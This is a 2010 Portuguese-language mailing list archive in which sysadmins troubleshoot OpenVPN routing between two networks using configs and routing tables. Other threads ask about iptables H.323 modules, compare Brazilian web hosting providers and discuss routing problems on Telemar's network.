Mask:255.255.255.128 inet6 addr: fe80::224:81ff:feb3:d4eb/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1050668475 errors:0 dropped:0 overruns:0 frame:0 TX packets:726501574 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:2175185864 (2.0 GiB) TX bytes:100730747 (96.0 MiB) Memory:f0180000-f01a0000 eth1 Link encap:Ethernet HWaddr 00:60:08:ad:5c:a8 inet addr:192.168.8.1 Bcast:192.168.8.255 Mask:255.255.255.0 inet6 addr: fe80::260:8ff:fead:5ca8/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:735896213 errors:0 dropped:0 overruns:0 frame:0 TX packets:1047928274 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1898847654 (1.7 GiB) TX bytes:294359726 (280.7 MiB) Interrupt:20 Base address:0x1100 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:406255 errors:0 dropped:0 overruns:0 frame:0 TX packets:406255 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:50453105 (48.1 MiB) TX bytes:50453105 (48.1 MiB) tun0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:10.0.0.2 P-t-P:10.0.0.1 Mask:255.255.255.255 UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1 RX packets:1047648476 errors:0 dropped:0 overruns:0 frame:0 TX packets:725927171 errors:0 dropped:1554721 overruns:0 carrier:0 collisions:0 txqueuelen:100 RX bytes:1775638638 (1.6 GiB) TX bytes:3375087263 (3.1 GiB) As minhas redes s?o 192.168.8.0/24 de um lado e 192.168.9.0/24 em outro local, o tunnel VPN ? 10.0.0.0 e a rede publica xxx.xxx.xxx.0/25 e xxx.xxx.xxx.128/25 Att, Egberto Monteiro Em 09/01/2010 03:52 PM, Marcio Merlone escreveu: > Colegas, > > Desculpem o tamanho da quest?o e sejam caridosos com este bizonho que > vos fala e confessa a incapacidade de rotear duas redes por uma VPN > com o OpenVPN 2.1.0-1ubuntu1.1. Preciso de ajuda para fazer as duas > redes se enxergar pela VPN, ou seja, o cliente e servidor ovpn v?o ter > que rotear de uma rede pra outra (n?o s? o cliente e servidor, mas as > redes todas). Todos os envolvidos est?o em redes l?gicas e geogr?ficas > distintas e (ainda) sem iptables. Resumindo: > > Servidor: 192.168.0.100/24 (Default GW = 192.168.0.254 = gw.dominio) > Cliente: 10.1.0.1/16 (a VPN fecha via internet) > Rede para a VPN: 10.255.0.0/24 > > Server.conf: > port 1194 > proto udp > dev tun > ca ca.crt > cert server.crt > key server.key > dh dh1024.pem > server 10.255.0.0 255.255.255.0 > ifconfig-pool-persist ipp.txt > client-config-dir ccd > route 10.1.0.0 255.255.0.0 > route 10.255.0.0 255.255.0.0 > push "route 192.168.0.0 255.255.255.0" > push "dhcp-option WINS 192.168.0.1" > client-to-client > keepalive 10 120 > tls-auth ta.key 0 # This file is secret > comp-lzo > user nobody > group nogroup > persist-key > persist-tun > status openvpn-status.log > verb 3 > mute 20 > script-security 1 execve > > Configura??o para cliente em 'ccd\cliente': > iroute 10.1.0.0 255.255.255.0 > ifconfig-push 10.255.0.2 10.255.0.1 > > No default gateway da rede 192.168.0.0 (192.168.0.254) foi configurada > a rota para a rede 10.1.0.0 via o 192.168.0.100. > > Desta forma, quando subo a VPN, uma m?quina qualquer da rede > 192.168.0.0/24 consegue pingar o cliente 10.1.0.1, mas n?o uma m?quina > na rede, por exemplo o 10.1.0.3 (que sei que existe e ? ip fixo): > > root at desktop:~# traceroute 10.1.0.1 > traceroute to 10.1.0.1 (10.1.0.1), 30 hops max, 60 byte packets > 1 gw.dominio (192.168.0.254) 0.409 ms 0.453 ms 0.548 ms > 2 ovpn.dominio (192.168.0.100) 0.731 ms 0.758 ms 0.774 ms > 3 10.1.0.1 (10.1.0.1) 21.512 ms 22.055 ms 22.730 ms > root at desktop:~# > > root at desktop:~# traceroute 10.1.0.3 > traceroute to 10.1.0.3 (10.1.0.3), 30 hops max, 60 byte packets > 1 gw.dominio (192.168.0.254) 0.422 ms 0.495 ms 0.589 ms > 2 ovpn.dominio (192.168.0.100) 0.720 ms 0.759 ms 0.811 ms > 3 10.255.0.2 (10.255.0.2) 21.766 ms 22.897 ms 23.498 ms > 4 * * * > 5 * * * > 6 *^C > root at desktop:~# > > O que me estranha ? que o terceiro salto ? diferente. Quando > estabelecida a VPN, as tabelas de roteamento ficam: > > Servidor: > root at ovpn:/etc/openvpn# route -n > Tabela de Roteamento IP do Kernel > Destino Roteador M?scaraGen. Op??es M?trica Ref > Uso Iface > 10.255.0.2 0.0.0.0 255.255.255.255 UH 0 0 > 0 tun0 > 10.255.0.0 10.255.0.2 255.255.255.0 UG 0 0 > 0 tun0 > 192.168.0.0 0.0.0.0 255.255.255.0 U 0 0 > 0 eth3 > 10.1.0.0 10.255.0.2 255.255.0.0 UG 0 0 > 0 tun0 > 10.255.0.0 10.255.0.2 255.255.0.0 UG 0 0 > 0 tun0 > 0.0.0.0 192.168.0.254 0.0.0.0 UG 0 0 > 0 eth3 > root at ovpn:/etc/openvpn# > > Cliente: > root at cliente:/etc/network# route -n > Kernel IP routing table > Destination Gateway Genmask Flags Metric Ref > Use Iface > 10.255.0.1 0.0.0.0 255.255.255.255 UH 0 0 > 0 tun0 > 187.17.143.160 0.0.0.0 255.255.255.252 U 0 0 > 0 eth1 > 10.255.0.0 10.255.0.1 255.255.255.0 UG 0 0 > 0 tun0 > 192.168.0.0 10.255.0.1 255.255.255.0 UG 0 0 > 0 tun0 > 10.1.0.0 0.0.0.0 255.255.0.0 U 0 0 > 0 eth0 > 0.0.0.0 187.17.143.162 0.0.0.0 UG 100 0 > 0 eth1 > root at cliente:/etc/network# > > A pergunta ?: ond? quieu t? comendo bola? > > Grato por qualquer dica, rtfm, link, etc. Depois que eu resolver isso, > ainda vou ter que adicionar mais outra rede cliente e fazer as duas se > enxergarem pela VPN... > From marcio.merlone at a1.ind.br Wed Sep 1 17:05:02 2010 From: marcio.merlone at a1.ind.br (Marcio Merlone) Date: Wed, 01 Sep 2010 17:05:02 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?Roteamento_entre_2_redes_atr=E1s_de_Ope?= =?iso-8859-1?q?nVPN?= In-Reply-To: <4C7EAE3F.50800@gmail.com> References: <4C7EA0EA.9020704@a1.ind.br> <4C7EAE3F.50800@gmail.com> Message-ID: <4C7EB1EE.6010501@a1.ind.br> Em 01-09-2010 16:49, Egberto Monteiro escreveu: > Acho que vc s? comeu bola invertendo as redes. H?? > Da uma olhada neste exemplo em produ??o que tenho aqui: > (...) > As minhas redes s?o 192.168.8.0/24 de um lado e 192.168.9.0/24 em > outro local, o tunnel VPN ? 10.0.0.0 e a rede publica xxx.xxx.xxx.0/25 > e xxx.xxx.xxx.128/25 E desta forma uma m?quina 192.168.8.x consegue pingar outra 192.168.9.x? -- Marcio Merlone From egbertomonteiro at gmail.com Wed Sep 1 17:12:50 2010 From: egbertomonteiro at gmail.com (Egberto Monteiro) Date: Wed, 01 Sep 2010 17:12:50 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?Roteamento_entre_2_redes_atr=E1s_de_Ope?= =?iso-8859-1?q?nVPN?= In-Reply-To: <4C7EB1EE.6010501@a1.ind.br> References: <4C7EA0EA.9020704@a1.ind.br> <4C7EAE3F.50800@gmail.com> <4C7EB1EE.6010501@a1.ind.br> Message-ID: <4C7EB3C2.2000106@gmail.com> ########### Esta??o 8.52 $ ping 192.168.9.3 PING 192.168.9.3 (192.168.9.3) 56(84) bytes of data. 64 bytes from 192.168.9.3: icmp_seq=1 ttl=62 time=0.980 ms 64 bytes from 192.168.9.3: icmp_seq=2 ttl=62 time=0.955 ms ^C --- 192.168.9.3 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1002ms rtt min/avg/max/mdev = 0.955/0.967/0.980/0.033 ms ########### Esta??o 9.3 ifconfig eth0 Link encap:Ethernet HWaddr 00:25:b3:82:db:73 inet addr:192.168.9.3 Bcast:192.168.9.255 Mask:255.255.255.0 inet6 addr: fe80::225:b3ff:fe82:db73/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:511691148 errors:0 dropped:0 overruns:0 frame:0 TX packets:836425861 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:3007858413 (2.8 GiB) TX bytes:3977942821 (3.7 GiB) Interrupt:17 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:8750341 errors:0 dropped:0 overruns:0 frame:0 TX packets:8750341 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:1508240343 (1.4 GiB) TX bytes:1508240343 (1.4 GiB) route -n Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.9.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 0.0.0.0 192.168.9.1 0.0.0.0 UG 0 0 0 eth0 ping 192.168.8.52 PING 192.168.8.52 (192.168.8.52) 56(84) bytes of data. 64 bytes from 192.168.8.52: icmp_seq=1 ttl=62 time=1.02 ms 64 bytes from 192.168.8.52: icmp_seq=2 ttl=62 time=0.856 ms ^C --- 192.168.8.52 ping statistics --- 2 packets transmitted, 2 received, 0% packet loss, time 1002ms rtt min/avg/max/mdev = 0.856/0.938/1.021/0.088 ms Respondido? Att, Egberto Monteiro Em 09/01/2010 05:05 PM, Marcio Merlone escreveu: > Em 01-09-2010 16:49, Egberto Monteiro escreveu: >> Acho que vc s? comeu bola invertendo as redes. > H?? > >> Da uma olhada neste exemplo em produ??o que tenho aqui: >> (...) >> As minhas redes s?o 192.168.8.0/24 de um lado e 192.168.9.0/24 em >> outro local, o tunnel VPN ? 10.0.0.0 e a rede publica >> xxx.xxx.xxx.0/25 e xxx.xxx.xxx.128/25 > > E desta forma uma m?quina 192.168.8.x consegue pingar outra 192.168.9.x? > From juliano.godoi at gmail.com Fri Sep 3 01:49:01 2010 From: juliano.godoi at gmail.com (Juliano Silva) Date: Thu, 2 Sep 2010 21:49:01 -0700 (PDT) Subject: [MASOCH-L] Juliano Silva quer manter contato no LinkedIn Message-ID: <511989002.7336653.1283489341509.JavaMail.app@ech3-cdn07.prod> LinkedIn ------------Juliano Silva requested to add you as a connection on LinkedIn: ------------------------------------------ jaime, Eu gostaria de adicion?-lo(a) ? minha rede profissional no LinkedIn. - Juliano Silva Accept invitation from Juliano Silva http://www.linkedin.com/e/-gsgnzl-gdmkey4i-5z/vur4MERdwBKTwIUyMw8Bvwb9gPSPxmZL_4p1LZ/blk/I2311560749_2/1BpC5vrmRLoRZcjkkZt5YCpnlOt3RApnhMpmdzgmhxrSNBszYOnPAQdP0Sdj4NcP99bQRqsS9Nunl6bP4PczsNej0Pdz4LrCBxbOYWrSlI/EML_comm_afe/ View invitation from Juliano Silva http://www.linkedin.com/e/-gsgnzl-gdmkey4i-5z/vur4MERdwBKTwIUyMw8Bvwb9gPSPxmZL_4p1LZ/blk/I2311560749_2/39vejgTc3oRcj4PcAALqnpPbOYWrSlI/svi/ ------------------------------------------ DID YOU KNOW you can conduct a more credible and powerful reference check using LinkedIn? Enter the company name and years of employment or the prospective employee to find their colleagues that are also in your network. This provides you with a more balanced set of feedback to evaluate that new hire. http://www.linkedin.com/e/-gsgnzl-gdmkey4i-5z/rsr/inv-27/ ------ (c) 2010, LinkedIn Corporation From rodrigo.trevisaneli at gmail.com Tue Sep 14 10:27:16 2010 From: rodrigo.trevisaneli at gmail.com (Rodrigo Trevisaneli) Date: Tue, 14 Sep 2010 10:27:16 -0300 Subject: [MASOCH-L] Modulos H323 no iptables Message-ID: Ola, Vai ser instalado um dispositivo H323 na rede, e estou vendo o que preciso ajustar no iptables, que eh meu gateway/nat/firewall. Alem das portas que me passaram, vi que existem modulos de h323 para o iptables. Na minha instalacao encontrei 2. A duvida eh, preciso carregar esses modulos? Se sim, os 2 ou so um deles? nf_nat_h323 nf_conntrack_h323 Obrigado, -Rodrigo From farchanjo at gmail.com Tue Sep 14 15:38:34 2010 From: farchanjo at gmail.com (Fabricio Archanjo) Date: Tue, 14 Sep 2010 15:38:34 -0300 Subject: [MASOCH-L] Modulos H323 no iptables In-Reply-To: References: Message-ID: ? o ideal n?? esse modulos ir?o tratar as conex?es, assim como faz o nf_nat_ftp.. =) 2010/9/14 Rodrigo Trevisaneli : > Ola, > > Vai ser instalado um dispositivo H323 na rede, e estou vendo o que preciso > ajustar no iptables, que eh meu gateway/nat/firewall. > > Alem das portas que me passaram, vi que existem modulos de h323 para o > iptables. Na minha instalacao encontrei 2. A duvida eh, preciso carregar > esses > modulos? Se sim, os 2 ou so um deles? > > nf_nat_h323 > nf_conntrack_h323 > > Obrigado, > > -Rodrigo > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From mustardahc at gmail.com Wed Sep 15 15:14:52 2010 From: mustardahc at gmail.com (Bruno Camargo) Date: Wed, 15 Sep 2010 15:14:52 -0300 Subject: [MASOCH-L] Hospedagem WEB Message-ID: Srs, Algu?m tem dicas ou impress?es sobre empresas nacionais de hosting? Est?vamos na Locaweb mas cancelei por m? qualidade dos servi?os de email. Migrei para hostgator, mas em 3 dias j? observei diversas instabilidades nos servi?os de email. Estou vendo a Kinghost, mas j? vi q tem muitas reclama??es tbm. Algu?m tem alguma dica? Grato Bruno Camargo -- BrCaBadT From alex.weyer at gmail.com Wed Sep 15 15:17:24 2010 From: alex.weyer at gmail.com (Alex Weyer) Date: Wed, 15 Sep 2010 15:17:24 -0300 Subject: [MASOCH-L] Hospedagem WEB In-Reply-To: References: Message-ID: Olha, tenho utilizado a Kinghost para hospedagem Windows e E-mails e raramente encontro problemas. Utilizava a Locaweb tamb?m e s? me incomodei nos ultimos dois anos. Alex Em 15 de setembro de 2010 15:14, Bruno Camargo escreveu: > Srs, > > Algu?m tem dicas ou impress?es sobre empresas nacionais de hosting? > Est?vamos na Locaweb mas cancelei por m? qualidade dos servi?os de email. > Migrei para hostgator, mas em 3 dias j? observei diversas > instabilidades nos servi?os de email. > > Estou vendo a Kinghost, mas j? vi q tem muitas reclama??es tbm. > > Algu?m tem alguma dica? > > Grato > > Bruno Camargo > > -- > BrCaBadT > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Alex Weyer From listas at rafaelsantos.com Wed Sep 15 15:29:27 2010 From: listas at rafaelsantos.com (Rafael Santos) Date: Wed, 15 Sep 2010 15:29:27 -0300 Subject: [MASOCH-L] RES: Hospedagem WEB In-Reply-To: References: Message-ID: <00dd01cb5503$f016f3d0$d044db70$@rafaelsantos.com> Tamb?m sou assinante de um plano revenda da KingHost h? tempos e n?o tenho do que reclamar. Tive problemas? Sim, obviamente, mas todos foram resolvidos de maneira bastante satisfat?ria. Abra?os Rafael Santos -----Mensagem original----- De: masoch-l-bounces at eng.registro.br [mailto:masoch-l-bounces at eng.registro.br] Em nome de Alex Weyer Enviada em: quarta-feira, 15 de setembro de 2010 15:17 Para: Mail Aid and Succor, On-line Comfort and Help Assunto: Re: [MASOCH-L] Hospedagem WEB Olha, tenho utilizado a Kinghost para hospedagem Windows e E-mails e raramente encontro problemas. Utilizava a Locaweb tamb?m e s? me incomodei nos ultimos dois anos. Alex Em 15 de setembro de 2010 15:14, Bruno Camargo escreveu: > Srs, > > Algu?m tem dicas ou impress?es sobre empresas nacionais de hosting? > Est?vamos na Locaweb mas cancelei por m? qualidade dos servi?os de email. > Migrei para hostgator, mas em 3 dias j? observei diversas > instabilidades nos servi?os de email. > > Estou vendo a Kinghost, mas j? vi q tem muitas reclama??es tbm. > > Algu?m tem alguma dica? > > Grato > > Bruno Camargo > > -- > BrCaBadT > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Alex Weyer __ masoch-l list https://eng.registro.br/mailman/listinfo/masoch-l From leolistas at solutti.com.br Wed Sep 15 15:33:19 2010 From: leolistas at solutti.com.br (Leonardo Rodrigues) Date: Wed, 15 Sep 2010 15:33:19 -0300 Subject: [MASOCH-L] Hospedagem WEB In-Reply-To: References: Message-ID: <4C91116F.8060703@solutti.com.br> ? uma situa??o meio 'Casas Bahia' essa quest?o de hospedagem ... voc? quer pagar quanto ??? quanto menos estiver disposto a pagar, muito provavelmente menor ser? a qualidade (e estabilidade) dos servi?os contratados. N?o tem m?gica .... Em 15/09/2010 15:14, Bruno Camargo escreveu: > Srs, > > Algu?m tem dicas ou impress?es sobre empresas nacionais de hosting? > Est?vamos na Locaweb mas cancelei por m? qualidade dos servi?os de email. > Migrei para hostgator, mas em 3 dias j? observei diversas > instabilidades nos servi?os de email. > > Estou vendo a Kinghost, mas j? vi q tem muitas reclama??es tbm. > -- Atenciosamente / Sincerily, Leonardo Rodrigues Solutti Tecnologia http://www.solutti.com.br Minha armadilha de SPAM, N?O mandem email gertrudes at solutti.com.br My SPAMTRAP, do not email it From manoel at vetor.com.br Wed Sep 15 15:38:21 2010 From: manoel at vetor.com.br (manoel Wanderley) Date: Wed, 15 Sep 2010 15:38:21 -0300 Subject: [MASOCH-L] Hospedagem WEB In-Reply-To: References: Message-ID: <4C91129D.2060603@vetor.com.br> Pode usar a WB Internet que ? muito boa. Tem hospedagem em linux e windows, com CPANEL www.wb.com.br SDs Manoel Wanderley manoel at vetor.com.br > Srs, > > Algu?m tem dicas ou impress?es sobre empresas nacionais de hosting? > Est?vamos na Locaweb mas cancelei por m? qualidade dos servi?os de email. > Migrei para hostgator, mas em 3 dias j? observei diversas > instabilidades nos servi?os de email. > > Estou vendo a Kinghost, mas j? vi q tem muitas reclama??es tbm. > > Algu?m tem alguma dica? > > Grato > > Bruno Camargo > > -- > BrCaBadT > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From roberto.berto at gmail.com Wed Sep 15 15:42:08 2010 From: roberto.berto at gmail.com (=?UTF-8?Q?Roberto_Bert=C3=B3?=) Date: Wed, 15 Sep 2010 15:42:08 -0300 Subject: [MASOCH-L] Hospedagem WEB In-Reply-To: <4C91129D.2060603@vetor.com.br> References: <4C91129D.2060603@vetor.com.br> Message-ID: Boa tarde, Esta ocorrendo um movimento do setor a respeito disso, acompanhem no Twitter http://search.twitter.com/search?q=%23hostsbrasil 2010/9/15 manoel Wanderley > Pode usar a WB Internet que ? muito boa. Tem hospedagem em linux e > windows, com CPANEL > www.wb.com.br > SDs > Manoel Wanderley > manoel at vetor.com.br > > Srs, >> >> Algu?m tem dicas ou impress?es sobre empresas nacionais de hosting? >> Est?vamos na Locaweb mas cancelei por m? qualidade dos servi?os de email. >> Migrei para hostgator, mas em 3 dias j? observei diversas >> instabilidades nos servi?os de email. >> >> Estou vendo a Kinghost, mas j? vi q tem muitas reclama??es tbm. >> >> Algu?m tem alguma dica? >> >> Grato >> >> Bruno Camargo >> >> -- >> BrCaBadT >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> >> > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > -- Atenciosamente, ---------------------------------------------------------- Roberto Bert? TeHospedo - hospedagem de sites - http://www.TeHospedo.com.br - 51 32277727 ---------------------------------------------------------- From renato.pinheiro at pobox.com Wed Sep 15 16:58:11 2010 From: renato.pinheiro at pobox.com (Renato Pinheiro de Souza) Date: Wed, 15 Sep 2010 16:58:11 -0300 Subject: [MASOCH-L] Hospedagem WEB In-Reply-To: References: <4C91129D.2060603@vetor.com.br> Message-ID: <4C912553.5000304@pobox.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Se puder gastar US$ 50 / ano por conta, Google Apps (http://www.google.com/apps/intl/en/business/index.html) para os emails. Uso em v?rios clientes e funciona muito bem. []s, Renato Pinheiro renato.pinheiro at pobox.com pinheiro at gmail.com On 15/09/10 15:42, Roberto Bert? wrote: > Boa tarde, > > Esta ocorrendo um movimento do setor a respeito disso, acompanhem no Twitter > > http://search.twitter.com/search?q=%23hostsbrasil > > > 2010/9/15 manoel Wanderley > >> Pode usar a WB Internet que ? muito boa. Tem hospedagem em linux e >> windows, com CPANEL >> www.wb.com.br >> SDs >> Manoel Wanderley >> manoel at vetor.com.br >> >> Srs, >>> >>> Algu?m tem dicas ou impress?es sobre empresas nacionais de hosting? >>> Est?vamos na Locaweb mas cancelei por m? qualidade dos servi?os de email. >>> Migrei para hostgator, mas em 3 dias j? observei diversas >>> instabilidades nos servi?os de email. >>> >>> Estou vendo a Kinghost, mas j? vi q tem muitas reclama??es tbm. >>> >>> Algu?m tem alguma dica? >>> >>> Grato >>> >>> Bruno Camargo >>> >>> -- >>> BrCaBadT >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >>> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEcBAEBAgAGBQJMkSVTAAoJEI9mFb9uQqk5b6QH/1shZvXBvmcAkF7+P/nr/f1k FyPUMDrPOsXSG7rLwC9UOaqgaLJddvT8ems1H9A9wHQmJot4wNuCwsBywzGSj3Nr /V01aVH9xWFS0sLGbib8NMQmlZPXWfaRGJP+27T6Df62QbYSsrlDLPc1l+VhQRYH sZzReCWI53iJ9jmlDxWwcwAFuvHaSASsnNMJrNRWchA6uLwcnqCs7fh7MXYLRw+P 0asjCyF19pJet9pLtgs13eu6/NORuLx13H8bu0UPgaA8dD3k9EMK2P+XcUNCHAm2 RSmKY28JEwsgXrwp3Oj8Y6aAYM3DNIDNiIq7LtcmE85R12KZykT+LUXhArmiiUM= =xRkq -----END PGP SIGNATURE----- From victor_volpe at bol.com.br Wed Sep 15 18:27:34 2010 From: victor_volpe at bol.com.br (Victor) Date: Wed, 15 Sep 2010 18:27:34 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?=5BURG=CANTE=5D_Algu=E9m_da_Telemar?= Message-ID: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC> Ol? pessoal, Algu?m aqui trabalha na Telemar ? Estou com um problema grav?ssimo a quase 1 m?s e n?o sei a quem recorrer. Tenho um Link Dedicado de Fibra ?ptica da Telef?nica e hospedo um Jogo Online nele. Duas semanas pra c?, v?rias pessoas que passam pela rota da Telemar est?o tomando disconnect do jogo e perdendo acesso ao site por v?rios segundos e depois volta a funcionar. Consegui que um dos jogadores me mostrasse exatamente no momento do disconnect o tracert para o meu servidor e assustei. Pedi para ele deixar pingando enquanto jogava o meu servidor e o site da UOL pra conseguir capturar o momento da queda. Segue as Screen shots: http://img411.imageshack.us/img411/4351/73182920.jpg http://img821.imageshack.us/img821/3342/dctracert.jpg Agora vejam quando a comunica??o foi restabelecida: http://img826.imageshack.us/img826/3342/tracert2.jpg Da pra ver claramente que a rota foi totalmente alterada depois do IP 200.199.167.125 no momento da falha de comunica??o. Eu n?o sei a quem reclamar e gostaria da ajuda de voc?s nessa empreitada. Qualquer ajuda ? bem vinda. Obrigado desde j? ! From alexandre at onda.psi.br Wed Sep 15 18:34:59 2010 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Wed, 15 Sep 2010 18:34:59 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?=5BURG=CANTE=5D_Algu=E9m_da_Telemar?= In-Reply-To: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC> References: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC> Message-ID: <4C913C03.2010503@onda.psi.br> bgp at oi.net.br ?! Em 15/09/2010 18:27, Victor escreveu: > a Telef?nica e hospedo um Jogo Online nele. Duas semanas pra c?, > v?rias pessoas que passam pela rota da Telemar est?o tomando > disconnect do jogo e -- Sds. Alexandre Jeronimo Correa S?cio-Administrador Onda Internet www.onda.net.br IPV6 Ready ! www.ipv6.onda.net.br From bruno at openline.com.br Wed Sep 15 19:18:26 2010 From: bruno at openline.com.br (Bruno L F Cabral) Date: Wed, 15 Sep 2010 19:18:26 -0300 (BRT) Subject: [MASOCH-L] =?utf-8?b?W1VSR8OKTlRFXSBBbGd1w6ltIGRhIFRlbGVtYXI=?= In-Reply-To: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC> References: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC> Message-ID: <42611.187.59.120.96.1284589106.squirrel@www.openline.com.br> Ola voce tem ASN/bloco ou esta usando IP da telefonica? Em Qua, Setembro 15, 2010 6:27 pm, Victor escreveu: > Algu?m aqui trabalha na Telemar ? Estou com um problema grav?ssimo a quase 1 m?s e n?o sei a quem recorrer. sinto muito mas duvido que alguem da BROI de importancia a ponto de resolver. Voce pode, no entanto, postar o problema na lista dos admins gter at eng.registro.br e torcer por uma alma caridosa OU pode contratar um link de 64 da BROI so para os clientes dela te acessarem !3runo -- Provedor Wireless? Visite http://www.cfide.com.br ALIX, WRAP, Atheros, FlashIDE, Consultoria BGP etc. From rubensk at gmail.com Wed Sep 15 19:39:35 2010 From: rubensk at gmail.com (Rubens Kuhl) Date: Wed, 15 Sep 2010 19:39:35 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?=5BURG=CANTE=5D_Algu=E9m_da_Telemar?= In-Reply-To: <42611.187.59.120.96.1284589106.squirrel@www.openline.com.br> References: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC> <42611.187.59.120.96.1284589106.squirrel@www.openline.com.br> Message-ID: 2010/9/15 Bruno L F Cabral : > Ola > > voce tem ASN/bloco ou esta usando IP da telefonica? > > Em Qua, Setembro 15, 2010 6:27 pm, Victor escreveu: >> Algu?m aqui trabalha na Telemar ? Estou com um problema grav?ssimo a > quase 1 m?s e n?o sei a quem recorrer. > > sinto muito mas duvido que alguem da BROI > de importancia a ponto de resolver. Voce pode, > no entanto, postar o problema na lista dos > admins gter at eng.registro.br e torcer por uma > alma caridosa Na verdade a caiu at eng.registro.br ? mais apropriada. > OU > > pode contratar um link de 64 da BROI so > para os clientes dela te acessarem Infelizmente todo servi?o online hoje precisa fazer isso, dada a baixa qualidade de tr?fego entre as teles. Curiosamente, a comunica??o entre n?cleos da Oi (AS 7738) tamb?m ? estranha... assim, um servi?o online hoje precisa ter um servidor em SP na Telef?nica, uma liga??o com a BrT (AS 8167) e presen?a em alguma cidade da Oi que n?o SP, como Rio, BH ou Salvador. Rubens From victor_volpe at bol.com.br Wed Sep 15 20:05:53 2010 From: victor_volpe at bol.com.br (Victor) Date: Wed, 15 Sep 2010 20:05:53 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?=5BURG=CANTE=5D_Algu=E9m_da_Telemar?= In-Reply-To: <4C913C03.2010503@onda.psi.br> References: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC> <4C913C03.2010503@onda.psi.br> Message-ID: <3FF687514D1E44BD827FCA4B2661457A@VictorPC> > bgp at oi.net.br ?! Ser? que eles v?o responder Al? ? Voc? que j? tem BGP, sabe mais ou menos o que est? acontecendo ? Isso come?ou de 1 m?s pra c?. Antes era redondinho. Queria ter um n?vel de conversa diferenciado com eles, pois eu n?o manjo nada de BGP. Lembrando que eu uso IP's da Telef?nica. []'s From victor_volpe at bol.com.br Wed Sep 15 20:10:53 2010 From: victor_volpe at bol.com.br (Victor) Date: Wed, 15 Sep 2010 20:10:53 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?=5BURG=CANTE=5D_Algu=E9m_da_Telemar?= In-Reply-To: References: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC><42611.187.59.120.96.1284589106.squirrel@www.openline.com.br> Message-ID: <0AA802EAF6B84B82A965158F1DFE9EC2@VictorPC> > Infelizmente todo servi?o online hoje precisa fazer isso, dada a baixa > qualidade de tr?fego entre as teles. Curiosamente, a comunica??o entre > n?cleos da Oi (AS 7738) tamb?m ? estranha... assim, um servi?o online > hoje precisa ter um servidor em SP na Telef?nica, uma liga??o com a > BrT (AS 8167) e presen?a em alguma cidade da Oi que n?o SP, como Rio, > BH ou Salvador. Compreendo perfeitamente Rubens, tive que tirar meu servidor desta configura??o, pois fui sniffado dentro do Data Center de uma empresa a qual n?o vou citar o nome e tive meus dados roubados. Estou entrando com processo contra eles por perdas e danos e pretendo nunca mais trabalhar com empresas que s? tem nome e marketing. No momento n?o disponho de verba para aquisi??o de outra LP de Dados pois o custo aqui no interior ? ainda muito elevado. Estou me baseando no fato de que se antes funcionava perfeitamente, porque agora come?ou estes problemas ? []'s From alexandre at onda.psi.br Wed Sep 15 20:42:53 2010 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Wed, 15 Sep 2010 20:42:53 -0300 Subject: [MASOCH-L] =?iso-8859-1?q?=5BURG=CANTE=5D_Algu=E9m_da_Telemar?= In-Reply-To: <0AA802EAF6B84B82A965158F1DFE9EC2@VictorPC> References: <5C5409E79B7D46E5BF4DCE018A3884E8@VictorPC><42611.187.59.120.96.1284589106.squirrel@www.openline.com.br> <0AA802EAF6B84B82A965158F1DFE9EC2@VictorPC> Message-ID: <4C9159FD.3020500@onda.psi.br> Penso que nessas horas.. ? bom ter o INOC ativo hehehe !! mas precisa ser um AS :P Em 15/09/2010 20:10, Victor escreveu: >> Infelizmente todo servi?o online hoje precisa fazer isso, dada a baixa >> qualidade de tr?fego entre as teles. Curiosamente, a comunica??o entre >> n?cleos da Oi (AS 7738) tamb?m ? estranha... 